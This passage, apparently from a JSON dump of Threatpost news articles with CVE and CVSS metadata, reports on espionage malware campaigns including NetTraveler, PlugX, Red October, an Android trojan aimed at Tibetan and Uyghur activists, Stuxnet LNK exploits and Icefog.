These infections indicate that certain high profile victims are targeted by multiple threat actors; the target information is a valuable commodity,\u201d the report said, adding that the victims include a Russian military contractor, a Tajikistan government entity and embassy workers in Iran, Belgium, Kazakhstan and Belarus.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/06/07045233/nettraveler_03s.png>)\n\nThe attacks start with a spear phishing campaign targeting vulnerabilities described in [CVE-2012-0158](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0158>) and [CVE-2010-3333](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3333>). The messages and attached decoy documents vary according to the various targets and use a number of exploits that achieve remote code execution by exploiting memory vulnerabilities in Office documents. Both have been patched, yet these attacks demonstrate the vulnerabilities are still reachable on some systems; no zero-days, rootkits or other advanced malware have been used in the NetTraveler campaign.\n\nKaspersky researchers found more than 22 gigabytes of stolen data on command and control servers they were able to sinkhole and analyze.\n\n\u201cHowever this data represents only a small fraction which we managed to see \u2013 the rest of it had been previously downloaded and deleted from the C&C servers by the attackers,\u201d a report on the campaign said.\n\nKaspersky researchers said the command and control servers were running IIS 6 and 7 and a Microsoft ASP backend. The attackers transferred the stolen data from the command infrastructure using FTP through a VPN connection to a server in the U.S. hosted by Krypt Technologies. 
\u201cThe infrastructure is secured by allowing FTP access only to remote users coming from predefined IPs, including the VPN provider in the U.S.,\u201d the report said.\n\nIn all, more than 30 command and control servers are used in the NetTraveler campaign and all either collect stolen data or help with obfuscation of the attacks. NetTraveler is so named because of a string found in all early versions of the malware: \u201cNetTraveler Is Running!\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/06/07045237/nettraveler_02.1s.png>)\n\nMost of the victims are diplomats, government agencies or military contractors, the report said. Combining data from the command and control servers and Kaspersky Security Network, almost 30 percent of infections happened in Mongolia, followed by Russia, India and Kazakhstan.\n\nKaspersky\u2019s GReAT team released a research report on NetTraveler, which includes indicators of compromise, that can be downloaded [here](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/06/22105852/kaspersky-the-net-traveler-part1-final-1.pdf>).\n", "cvss3": {}, "published": "2013-06-04T12:35:54", "type": "threatpost", "title": "NetTraveler Espionage Malware Campaign Ties to Gh0st RAT", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-3333", "CVE-2012-0158"], "modified": "2018-03-22T14:58:55", "id": "THREATPOST:67D34DEB790B708B10391D13A8BE6EAB", "href": "https://threatpost.com/net-traveler-espionage-campaign-uncovered-links-to-gh0st-rat-titan-rain-found/100865/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:23", "description": "Existing in some form since 2008, the popular remote access tool PlugX has as notorious a history as any malware, but according to researchers the tool saw a spike of popularity in 2014 and is the go-to malware for many adversary groups.\n\nMany attacks, especially those occurring during the 
latter half of the year, were seen using the tool. In fact, researchers are theorizing the further proliferation of PlugX, which enables attackers to log keystrokes, modify and copy files, capture screenshots, as well as the ability to quit processes, log users off, and completely reboot users\u2019 machines, could suggest eventual worldwide adoption.\n\nThe malware was the most used variant when it came to targeted activity in 2014 according to Crowdstrike\u2019s [Global Threat Report](<http://www.crowdstrike.com/2014-global-threat-report/>), released today. Despite kicking around for years, the malware is now the de facto tool for dozens of China-based adversarial groups the firm tracks.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2015/02/07005745/plugx.jpg>)\n\nOne of the ways the malware improved itself in 2014, and in turn caught on, was by switching up the way it communicates with its infrastructure further up the chain. By implementing a newer DNS command and control module, the malware has been able to send its data in the form of long DNS queries to its overseeing infrastructure.\n\n> Surge in PlugX infections could foreshadow future worldwide use via @Threatpost\n> \n> [Tweet](<https://twitter.com/share?url=https%3A%2F%2Fthreatpost.com%2Fplugx-go-to-malware-for-targeted-attacks-more-prominent-than-ever%2F110936%2F&text=Surge+in+PlugX+infections+could%C2%A0foreshadow%C2%A0future+worldwide+use+via+%40Threatpost>)\n\nBy modifying the way the DNS and HTTP requests are produced, something Crowdstrike is calling a deviation from \u201csome of the more typically monitored protocols,\u201d it\u2019s made it more difficult to be detected over the past year or so.\n\n\u201cThe upward trend in use of PlugX indicates an increasing confidence in the capabilities of the platform, justifying its continued use across multiple sectors and countries,\u201d according to the report.\n\nOne of the groups that Crowdstrike caught dropping PlugX on machines 
was a hacking collective it calls Hurricane Panda, who used the malware\u2019s custom DNS feature to spoof four DNS servers, including popular domains such as Pinterest.com, Adobe.com, and Github.com. Instead of their legitimate IP addresses, the malware was able to point these domains to a PlugX C&C node.\n\nThe malware, as has been the case in the past, is commonly delivered via a spear phishing attack. Some of the attacks go on to leverage a zero day from last March, CVE-2014-1761, which exploits vulnerable Microsoft RTF or Word documents. Others, meanwhile, make use of well-worn holes like CVE-2012-0158 in PowerPoint and Excel, which were also used by the [IceFog](<http://securelist.com/blog/incidents/58209/the-icefog-apt-hits-us-targets-with-java-backdoor/>), [Red October](<http://securelist.com/analysis/publications/36740/red-october-diplomatic-cyber-attacks-investigation/>), and [Cloud Atlas](<http://securelist.com/blog/research/68083/cloud-atlas-redoctober-apt-is-back-in-style/>) attacks.\n\nWhile some of the groups using PlugX have gone out of their way to register new domains for the malware\u2019s C&C, many domains from the last several years remain active, something else that Crowdstrike has attributed to the malware\u2019s success and persistence over the years.\n\nThe firm has two schools of thought when it comes to rationalizing how the malware has become so commonplace. It\u2019s thought that there\u2019s either a central malware dissemination channel that\u2019s pushing PlugX out to adversary groups or that groups that hadn\u2019t used PlugX in the past have recently been able to get copies of it via public repositories or the cybercrime underground. Either way, while the malware is mostly used by attackers from \u201ccountries surrounding China\u2019s sphere of influence,\u201d the report suggests that that trend could change soon enough. 
The malware has been used in recurring attacks against commercial entities in the U.S., and in other politically fueled attacks, but its rapid deployment \u201ccould be a precursor to future worldwide use,\u201d according to Crowdstrike.\n\n\u201cThe ongoing development of PlugX provides attackers with a flexible capability that requires continued vigilance on the part of network defenders in order to detect it reliably.\u201d\n", "cvss3": {}, "published": "2015-02-10T09:00:34", "type": "threatpost", "title": "Researchers: PlugX More Prominent Than Ever", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2014-1761"], "modified": "2015-02-10T14:19:16", "id": "THREATPOST:B991F2CF870C98BD40B817DE3CDF52A0", "href": "https://threatpost.com/plugx-go-to-malware-for-targeted-attacks-more-prominent-than-ever/110936/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:36", "description": "[](<https://threatpost.com/rocra-espionage-malware-campaign-uncovered-after-five-years-activity-011413/>)For five years, it hid in the weeds of networks used by Eastern European diplomats, government employees and scientific research organizations, stealing data and infecting more machines in an espionage campaign rivaling Flame and others of its ilk. The campaign, called Rocra or Red October by researchers at Kaspersky Lab, focused not only on workstations, but mobile devices and networking gear to gain a foothold inside strategic organizations. 
Once inside, attackers pivoted internally and stole everything from files on desktops, smartphones and FTP servers, to email databases using exploits developed in China and Russian malware, Kaspersky researchers said.\n\nWhile Kaspersky would not go so far as to call it a nation-state campaign, the resources behind the attackers and the targets they chose\u2014which also included oil and gas companies, aerospace, nuclear research, and trade and commerce organizations\u2014would indicate an interest in a particular type of information.\n\nMost of the victims were specific organizations in Eastern Europe, former USSR nations and countries in Central Asia. Some attacks were also noticed in Western Europe and North America, Kaspersky said.\n\n\u201cThe campaign is currently still active with data being sent to multiple command-and-control servers through an infrastructure which rivals the complexity of the Flame malware,\u201d Kaspersky said in a [report released today](<http://www.securelist.com/en/blog/785/The_Red_October_Campaign_An_Advanced_Cyber_Espionage_Network_Targeting_Diplomatic_and_Government_Agencies>).\n\nKaspersky said it was alerted of the Rocra attacks by a partner last October when it began its analysis of the campaign. Several hundred infections worldwide have been counted. Three exploits have been used in the attack, all of which Kaspersky said were developed in China; the malware modules dropped in the attacks were created by Russian-speaking operatives, Kaspersky concluded.\n\n\u201cCurrently, there is no evidence linking this with a nation-state sponsored attack. The information stolen by the attackers is obviously of the highest level and includes geopolitical data which can be used by nation states,\u201d the report said. 
\u201cSuch information could be traded in the underground and sold to the highest bidder, which can be of course, anywhere.\u201d\n\nLike most of these APT-style targeted attacks, this one begins with a spear phishing message; one example provided was an announcement of a diplomatic car for sale. The email messages contain one of three attachments, each a different exploit of an existing vulnerability. One targets [CVE-2009-3120](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3120>) using a malicious Microsoft Excel document, while the other two are Word docs exploiting [CVE-2010-3333](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3333>) or [CVE-2012-0158](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0158>). These exploits were used in previous attacks against Tibetan activists and military and energy targets in Asia; for Rocra, the attackers not only reused the exploits, but replaced the payload with their own malware.\n\nThe documents are tailored for specific victims and the malware modules have specific victim ID numbers, Kaspersky said. Rocra operates on a personal level with the victim; the level of interaction is high and driven by the victim\u2019s system configuration, the types of documents on their machine, software installed, native language and more.\n\nOnce the victim opens the malicious document, a Trojan is dropped on the machine, which in turn drops a module that scans the local network for other hosts vulnerable to [MS08-067](<http://technet.microsoft.com/en-us/security/bulletin/ms08-067>), the same vulnerability exploited by the Conficker worm, Kaspersky said. It also looks to access other hosts using credentials from its own password database. Another module tries to infect remote hosts on the same network. 
Kaspersky said the malware authors have Russian-speaking origins, and researchers had not seen the malicious executables before; one, for example, would change the default system codepage to 1251, which is required to render Cyrillic fonts, Kaspersky\u2019s report said.\n\nThe campaign targets not only Office documents, email and a long list of document types including the acid* extension, which Kaspersky said refers to the classified Acid Cryptofiler software used by the European Union and NATO.\n\n[](<http://www.securelist.com/en/images/pictures/klblog/208194085.png>)\n\n\u201cThe main purpose of the operation appears to be the gathering of classified information and geopolitical intelligence, although it seems that the information gathering scope is quite wide,\u201d the report said. \u201cDuring the past five years, the attackers collected information from hundreds of high profile victims although it\u2019s unknown how the information was used. It is possible that the information was sold on the black market, or used directly.\u201d\n\nThe command and control infrastructure behind this campaign is made up of 60 domains and a number of server host locations in Russia and Germany, most of which act as proxies in order to hide the true C&C server. Kaspersky said it was able to sinkhole six of the domains and watch them over since Nov. 2. More than 55,000 connections were made to the sinkhole from close to 250 IP addresses. 
Most of those IP addresses were in Switzerland, Kazakhstan, Greece and Belarus; there are victims in 39 countries.\n\nKaspersky said it has not found any connections between Rocra and [Flame](<https://threatpost.com/flame-attackers-used-collision-attack-forge-microsoft-certificate-060512/>), yet did say the campaign was more sophisticated than the [Aurora attacks on Google](<https://threatpost.com/inside-aurora-google-attack-malware-011910/>) or Night Dragon; its researchers found more than 1,000 unique malware files among 30 different categories, including reconnaissance, credential harvesting, email- and USB-specific modules, propagation, mobile devices and data exfiltration.\n\nSome of the modules are one-time tasks, while others must remain persistent. Examples of persistent tasks include: search and extract files from a USB drive; wait for a mobile phone to connect and, if it\u2019s an iPhone or Nokia, steal its contents, or if a Windows phone, install a mobile version of Rocra; record keystrokes and screenshots; and more. 
Examples of one-time tasks include: collection of system, network and software information; extract browsing history, saved passwords, Windows account hashes and Outlook account information; write and execute arbitrary code; scan for administrative credentials; scan for Cisco network devices; and more.\n\nMassive amounts of data were lost, the researchers said.\n\n\u201cWith Rocra, the attackers managed to stay in the game for over 5 years and evade detection of most antivirus products while continuing to exfiltrate what must be hundreds of Terabytes by now,\u201d Kaspersky said.\n", "cvss3": {}, "published": "2013-01-14T13:00:00", "type": "threatpost", "title": "Rocra Espionage Malware Campaign Uncovered After Five Years of Activity", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2009-3120", "CVE-2010-3333", "CVE-2012-0158"], "modified": "2013-05-10T14:24:31", "id": "THREATPOST:551363592C0C853E266999644B3579E4", "href": "https://threatpost.com/rocra-espionage-malware-campaign-uncovered-after-five-years-activity-011413/77397/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:02", "description": "[](<https://threatpost.com/researchers-uncover-targeted-attack-campaign-using-android-malware-032613/>)Android attacks have become all the rage in the last year or two, and targeted attacks against political activists in Tibet, Iran and other countries also have been bubbling up to the surface more and more often lately. Now those two trends have converged with the discovery of a targeted attack campaign that\u2019s going after Tibetan and Uyghur activists with a spear-phishing message containing a malicious APK file. Researchers say the attack appears to be coming from Chinese sources.\n\nThe new campaign began a few days ago when unknown attackers were able to compromise the email account of a well-known Tibetan activist. 
The attackers then used that account to begin sending a series of spear-phishing messages to other activists in the victim\u2019s contact list. One of the messages referred to a human rights conference in Geneva in March, using the recipients\u2019 legitimate interest in the conference as bait to get them to open the attachment. The malicious attachment in the emails is named \u201cWUC\u2019s Conference.apk\u201d.\n\nOnce the victim opens the attachment on her Android phone, the file installs an application called \u201cconference\u201d that will display some information about the Geneva conference. Meanwhile, the malware is running in the background.\n\n\u201cWhile the victim reads this fake message, the malware secretly reports the infection to a command-and-control server. After that, it begins to harvest information stored on the device,\u201d according to an [analysis of the attack by Kaspersky Lab](<https://www.securelist.com/en/blog/208194186/Android_Trojan_Found_in_Targeted_Attack>) researchers.\n\n\u201cIt is important to note that the data won\u2019t be uploaded to C&C server automatically. The Trojan waits for incoming SMS messages (the \u201calarmReceiver.class\u201d) and checks whether these messages contain one of the following commands: \u201csms\u201d, \u201ccontact\u201d, \u201clocation\u201d, \u201cother\u201d. If one these commands is found, then the malware will encode the stolen data with Base64 and upload it to the command and control server.\u201d\n\n\n\nThe malware looks for a specific set of data, including contacts, call logs, SMS messages, geolocation and phone data. The malware communicates with a command-and-control server at the URL: _hxxp://64.78.161.133/*victims\u2019s_cell_phone_number*/process.php. _The malware authors apparently have some familiarity with the Tibetan language, as some of the commands use native words. 
However, there are also a number of Chinese words and commands in the code.\n\n\u201cThroughout the code, the attackers log all important actions, which include various messages in Chinese. This was probably done for debugging purposes, indicating the malware may be an early prototype version,\u201d the Kaspersky analysis says.\n\nInterestingly, the C2 server for the attack is located in Los Angeles and is registered to a company based in Beijing. While this is one of the first known targeted attack campaigns to utilize Android as a delivery mechanism, it likely won\u2019t be the last.\n\n\u201cEvery day, there are hundreds if not thousands of targeted attacks against Tibetan and Uyghur supporters. The vast majority of these target Windows machines through Word documents exploiting known vulnerabilities such as CVE-2012-0158, CVE-2010-3333 and CVE-2009-3129,\u201d the analysis says.\n\n\u201cIn this case, the attackers hacked a Tibetan activist\u2019s account and used it to attack Uyghur activists. It indicates perhaps an interesting trend which is exploiting the trust relationships between the two communities. 
This technique reminds us of a combination between ages old war strategies \u2018Divide et impera\u2019 and \u2018By way of deception\u2019.\u201d\n", "cvss3": {}, "published": "2013-03-26T14:14:02", "type": "threatpost", "title": "Researchers Uncover Targeted Attack Campaign Using Android Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2009-3129", "CVE-2010-3333", "CVE-2012-0158"], "modified": "2013-04-17T16:30:29", "id": "THREATPOST:4474B9334E9322D775C57232CC4127EF", "href": "https://threatpost.com/researchers-uncover-targeted-attack-campaign-using-android-malware-032613/77667/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:48", "description": "One of the alleged mandates around the development of the Stuxnet worm was that malware\u2019s numerous components\u2014which included a handful of zero days\u2014should never escape the Natanz uranium enrichment facility in Iran. Eight years later, evidence continues to mount as to how that mandate was categorically not met.\n\nKaspersky Lab today released a [report](<https://securelist.com/analysis/publications/78125/exploits-how-great-is-the-threat/>) on exploits in the wild that indicates that endpoints are still running head-on into exploits for the since-patched [LNK vulnerability](<https://threatpost.com/key-stuxnet-lnk-spreading-mechanism-stops-working-062512/76730/>) ([CVE-2010-2568](<https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2568>)), almost two times more in 2016 than the next most prevalent exploit in circulation, Lotoor, which roots Android devices. In 2016, the Kaspersky report says, exploits for the LNK vulnerability (25 percent) and Lotoor (16 percent) account for 41 percent of exploits encountered by users. 
While these numbers are down from 2015 (27 percent and 11 percent respectively), the [LNK exploit](<https://securelist.com/blog/events/33206/the-day-the-stuxnet-died-27/>) appears to be hanging around for the foreseeable future.\n\n\u201cThis may be due to the fact that malware that uses these exploits have a self-replicating feature, constantly recreating themselves in the attacked network where vulnerable computers are installed,\u201d Kaspersky Lab said in its report.\n\nThe LNK exploit was just part of the Stuxnet attacks on Natanz, which targeted not only Windows machines running in the facility, but primarily Siemens programmable logic controllers managing centrifuges used to enrich uranium to support Iran\u2019s nuclear efforts. Exploits revolved around maliciously crafted .LNK files that were not processed securely as Windows Explorer icons were displayed. Successful exploits allowed the attackers to execute code in the Windows shell on vulnerable machines.\n\nLNK files define shortcuts to files or directories; Windows allows them to use custom icons from control panel files (.CPL). In Windows, those icons are loaded from modules, either executables or DLLs; CPLs are DLLs. An attacker is able to then define which executable module would be loaded, and use the .LNK file to execute arbitrary code inside of the Windows shell.\n\nWhile Microsoft quickly patched the vulnerability once it was disclosed in 2010, it was reported five years later that [the original patches were incomplete](<https://threatpost.com/patched-windows-machines-exposed-to-stuxnet-lnk-flaw-all-along/111558/>), forcing Microsoft to release an update bulletin with new patches.\n\nThe Kaspersky report, meanwhile, demonstrates the value of reliable exploits to attackers. Many of the exploits called out in the report are not flashy unpatched zero-days, but instead have some mileage on them. 
While [exploit kits dropped off](<https://threatpost.com/where-have-all-the-exploit-kits-gone/124241/>) the lists of top threats, venerable standbys such as CVE-2012-0158 in Office and CVE-2014-2423 in Java continue to draw the attention of exploit writers.\n\nThe widespread disappearance of exploit kits\u2014largely because of the [arrest of the criminals behind Angler](<https://threatpost.com/inside-the-demise-of-the-angler-exploit-kit/120222/>)\u2014has forced criminals to return to email-based attacks with macro-based malware buried inside Office attachments, now a top vehicle for malware delivery.\n\nFor example, attacks against browser and Windows vulnerabilities dropped 33.4 percent and 21.5 percent respectively from 2015 to 2016, Kaspersky said, while Office exploits rose 103 percent. While exploits against Adobe Flash and Android rose last year, Java and Adobe Reader exploits joined browsers and Windows on the negative side.\n\nKaspersky Lab said the number of browser vulnerabilities overall dropped 8 percent last year, while disclosed Office bugs went up 20 percent.\n\nOther noteworthy data points from the report include:\n\n * Kaspersky said it blocked 702 million attacks using an exploit in 2016, up 24 percent from 2015\n * Corporate users encountering attacks using exploits increased 28 percent\n * 70 percent of users encountered browser, Windows, Android or Office exploits\n * Russian-speaking APT Sofacy has used six zero-day exploits and 25 vulnerabilities overall; Equation Group has used eight zero days, and 17 vulnerabilities\n * 15 percent of computers in Europe and North America are still vulnerable to CVE-2012-0158\n", "cvss3": {}, "published": "2017-04-20T12:15:46", "type": "threatpost", "title": "Stuxnet LNK Exploits Still Widely Circulated", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-2568", "CVE-2012-0158", "CVE-2014-2423"], "modified": "2017-04-25T19:46:48", "id": "THREATPOST:C6DD041BAAC1DCF6C44CCBD19C9F1F13", "href": 
"https://threatpost.com/stuxnet-lnk-exploits-still-widely-circulated/125089/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:33", "description": "The [Red October espionage malware campaign](<https://threatpost.com/rocra-espionage-malware-campaign-uncovered-after-five-years-activity-011413/>) is providing security researchers with a deep dive into the complexity of targeted attacks, which in this case made use of more than 1,000 malware modules for everything from reconnaissance on targets to exfiltration of data to command and control servers.\n\nThe moving parts behind Red October are vast and have been under wraps for the better part of five years, [Kaspersky Lab researchers revealed this week](<http://www.securelist.com/en/blog/785/The_Red_October_Campaign_An_Advanced_Cyber_Espionage_Network_Targeting_Diplomatic_and_Government_Agencies>). The attackers behind this campaign targeted victims in 39 countries, primarily diplomats, researchers and military facilities among other institutions since August 2007. They stole reams of data and used exploits for known Microsoft vulnerabilities, constantly uploading their loot to a network of 60 command and control servers\u2014a number that rivals the 90-plus domains used by the Flame cyberespionage campaign.\n\nKaspersky was able to sinkhole a half dozen of those domains and watch over a two-month period 250 unique IP addresses connect more than 55,000 times. What they found was a fascinating mix of tasks mandated by the attackers, some of which remained persistent on compromised machines, while others were one-time operations. 
Most noteworthy is that attacks were tailored for particular victims, each with a unique identifier that enables the attacker to cobble together a complete picture of the victim\u2019s system configuration, browsing habits and more and manage each attack individually if need be.\n\n\u201cThis campaign is extraordinary in terms of the amount of effort that was invested to tailor the attack toolset for victims\u2019 environments,\u201d said senior security researcher Kurt Baumgartner.\n\nMost of the tasks assigned by the attacker via backdoors installed during initial infection are one-time operations delivered by a portable executable (PE) DLL that are executed in memory and discarded, Kaspersky said today in an [expanded report on the campaign](<http://www.securelist.com/en/blog/208194091/Red_October_part_two_the_modules>).\n\nOther tasks require a persistent presence on a machine and are delivered as PE EXE files. The attackers are using these persistent tasks to continually log keystrokes, record screenshots, retrieve email messages from Outlook or execute malicious payloads embedded in any of the Office-document exploits used to establish backdoor communication with the C&C servers.\n\nUnique among the persistent modules are those that are related to USB drives and mobile devices.\n\nFor example, one module will search and extract files and deleted files from a USB drive once it is connected to a compromised machine. Deleted files are restored and exfiltrated. Another module waits for an iPhone or Nokia smartphone to connect to the machine, then grabs device information, including contact information, call history, SMS messages, calendars and more. 
There is also a Windows Mobile module, which once one of those devices connects, infects the phone with a mobile version of the malware.\n\nThe campaign also targets documents with the acid* extension, which Kaspersky said refers to the classified Acid Cryptofiler software used by the European Union and NATO.\n\n\u201cThere is an incredible amount of functionality here that is new,\u201d Baumgartner said. \u201cIt\u2019s unusual to see it all in one campaign.\u201d\n\nSome of the one-time tasks include: collecting device hardware and software specs; filesystem and network share information; collecting information on installed software, including Oracle Database, messaging software and drivers and software for mobile devices and USB drives; extraction of browsing history from all leading browsers, saved passwords for websites, mail and IM accounts, Windows account hashes, and Outlook account information. Others include the ability to download files from FTP servers reachable from the infected machine, writing and executing code from the attacker, doing network scans and dumping configuration data from Cisco devices, and doing a network scan for other computers on the network vulnerable to the same exploit used by [Conficker (MS08-067)](<http://technet.microsoft.com/en-us/security/bulletin/ms08-067>).\n\nIn all there are nine module groups discovered in this campaign: reconnaissance; password or credential harvesting; email; USB drive; keyboard; persistence; propagation; mobile; and data exfiltration.\n\nKaspersky was alerted to the Red October campaign by a partner reporting a spear phishing campaign. 
Four exploits have been used in the attack: one targeting [CVE-2009-3129](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3129>) using a malicious Microsoft Excel document, and two others that are Word docs exploiting [CVE-2010-3333](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3333>) or [CVE-2012-0158](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0158>). The fourth is a Java exploit discovered by researchers at Seculert. All of the Office exploits were used in previous attacks against Tibetan activists and military and energy targets in Asia, Kaspersky said.\n\nMost of the 60 C&C domains are in Russia and Germany while the victims are worldwide, with most of the IP addresses connecting from Switzerland, Kazakhstan, Greece and Belarus. The attacks have not been attributed as of yet. A heat map of the attacks showed victims across the globe, but none in China, leading to speculation the Chinese could be behind the campaign. But Kaspersky researcher Costin Raiu cautioned today on the [Digital Underground podcast](<https://threatpost.com/costin-raiu-red-october-cyberespionage-campaign-011713/>) that because the company was able to sinkhole only six domains, they may not be seeing the complete infection picture.\n\nThe campaign, meanwhile, may be shutting down, Raiu said, adding that the infrastructure is being taken offline, with registrars killing the 60 domains and hosting companies killing the C&C servers.\n", "cvss3": {}, "published": "2013-01-17T19:20:06", "type": "threatpost", "title": "Inside the 1,000 Red October Cyberespionage Malware Modules", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2009-3120", "CVE-2009-3129", "CVE-2010-3333", "CVE-2012-0158"], "modified": "2013-05-10T14:15:16", "id": "THREATPOST:C0872257AF615C3542B0C9F0BAE4A57D", "href": "https://threatpost.com/inside-1000-red-october-cyberespionage-malware-modules-011713/77419/", "cvss": {"score": 9.3, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:05", "description": "An espionage campaign featuring precise targeting of victims and malware that allows the attackers one-on-one interaction with compromised systems has been uncovered. Government agencies, manufacturers, high tech companies and media organizations in South Korea and Japan have been the primary targets of the campaign called Icefog, which was reported today by researchers at Kaspersky Lab.\n\nThe China-based campaign is two years old and follows the pattern of similar APT-style attacks where victims are compromised via a malicious attachment in a spear-phishing email, or are lured to a compromised website and infected with malware.\n\n\n\nHowever, while other APT campaigns maintain a long-term persistence inside infected networks, Icefog seems to do just the opposite. The attackers, Kaspersky researchers said, know what they need from a victim and once they have it, the target is abandoned. They\u2019re also likely a small group of hired guns, akin to mercenaries, used to attack a particular group, steal data, and get out quickly.\n\n\u201cWe\u2019ve entered the era of a growing number of these smaller, agile groups hired on a per-project basis,\u201d said Kaspersky Lab researcher Kurt Baumgartner, speaking today at the Billington Cybersecurity Summit in Washington, D.C. \u201cThe operational improvements have arrived and these polished APT groups become much better at flying under the radar.\n\n\u201cFinding a pattern in all the noise is not easy. 
It\u2019s becoming harder and harder to identify the patterns and connect them with a group,\u201d Baumgartner said.\n\nTo date, Kaspersky Lab\u2019s Global Research and Analysis Team has observed six variants of Icefog and has been able to sinkhole 13 domains used in the attack, capturing snapshots of the malware used and logs detailing victims and interaction with command and control servers.\n\nWindows and Mac OS X versions of Icefog have also been observed, but it appears the OS X backdoor is merely a beta trial of the malware, largely found in online Chinese bulletin boards. Meanwhile, more than 200 unique Windows-based IP addresses have connected to a Kaspersky-controlled sinkhole, a fraction of the total infections researchers said.\n\n\u201cThere\u2019s a team of operators that are being very selective and going after exactly what they need,\u201d said Baumgartner, right. \u201cIt\u2019s classic APT behavior. They likely have previous knowledge of the networks and targets.\u201d\n\nThose targets include defense industry contractors such as Lig Nex1 and Selectron Industrial Company, shipbuilding companies DSME Tech, Hanjin Heavy Industries, telecom operators such as Korea Telecom and media companies such as Fuji TV.\n\nIcefog not only establishes a backdoor connection to the attacker-controlled command infrastructure, but it also drops a number of tools that allow the attackers to steal certain document types and pivot within an infected company looking for more computers to infect and additional resources to steal.\n\nThe campaign also relies on exploits for vulnerabilities that have been patched in Windows or Java to establish a foothold on an endpoint. Remote code execution bugs in Windows (CVE-2012-0158 and CVE-2012-1856) spread via malicious Word or Excel files are the most common means of initiating the Icefog attack. 
The infected attachments promise anything from an illicit image of a woman to a document written in Japanese titled: \u201cLittle enthusiasm for regional sovereignty reform.\u201d Users are also sent links to compromised sites hosting Java exploits (CVE-2013-0422 and CVE-2012-1723).\n\nSeparate spear phishing campaigns were also spotted using HLP files\u2014older versions of Winhelp files\u2014to infect targets. Winhelp was supported natively until Windows Vista was released.\n\n\u201cMost likely, the choice to abuse Winhelp indicates that the attackers have an idea of what version operating systems they are attacking,\u201d the Kaspersky report said.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/09/22105452/icefog.pdf>)\n\nAnother spear phishing effort used HWP document files to spread Icefog; HWP is a proprietary document format used in South Korea, in particular by the government.\n\nOnce a machine is compromised, the attackers individually analyze system information and files stored on the machine and if it passes muster, the backdoor and lateral movement tools are remotely sent to the machine, including password and hash-dumping tools for saved Internet Explorer and Outlook passwords. A compression program is also sent down to compress stolen data before it\u2019s sent to the command and control server. Beyond credentials, victims are losing Windows address book files (.WAB), as well as HWP, Excel and Word files.\n\nOf the six variants, the oldest in 2011 was used in an attack against Japan\u2019s House of Representatives and House of Councilors. Six AOL email addresses were used and commands were also fetched from these accounts.\n\nThe most commonly seen Icefog variant is called Type 1 and it has all the backdoor and lateral movement capabilities described earlier, as well as giving the attackers access to execute SQL commands on SQL Servers found on the network. 
It\u2019s here where the term Icefog was seen in a string used in the command and control server (the C&C software is named Dagger Three). The command and control script, meanwhile, provides a professional looking interface used to communicate and interact with compromised machines. It uses the native file system to store stolen data and temporary files.\n\n\u201cPerhaps the most interesting part is that the Type 1 C&C panel maintains a full history of the attacker\u2019s interaction with the victims,\u201d the report said. \u201cThis is kept as an encrypted logfile, in the \u2018logs\u2019 directory on the server. In addition to that, the server maintains full interaction logs and command execution results from each victim.\u201d\n\nAnother variant was used to enhance Type 1 infections with additional encryption obfuscating communication with command servers. It was not used against victims and disappeared once a machine was rebooted.\n\nSamples for two other variants have yet to be obtained, but Kaspersky was able to sinkhole three domains used with these attacks. These two variants had only view and update capabilities.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/09/07040656/ips_icefog.jpg>)\n\nThe most recent version, Icefog-NG, doesn\u2019t communicate with a central command server and instead of using a webserver, its command and control is a Windows desktop application that works as a standalone TCP server listening on port 5600.\n\nKaspersky said it first obtained an Icefog sample in June after an attack on Fuji TV. 
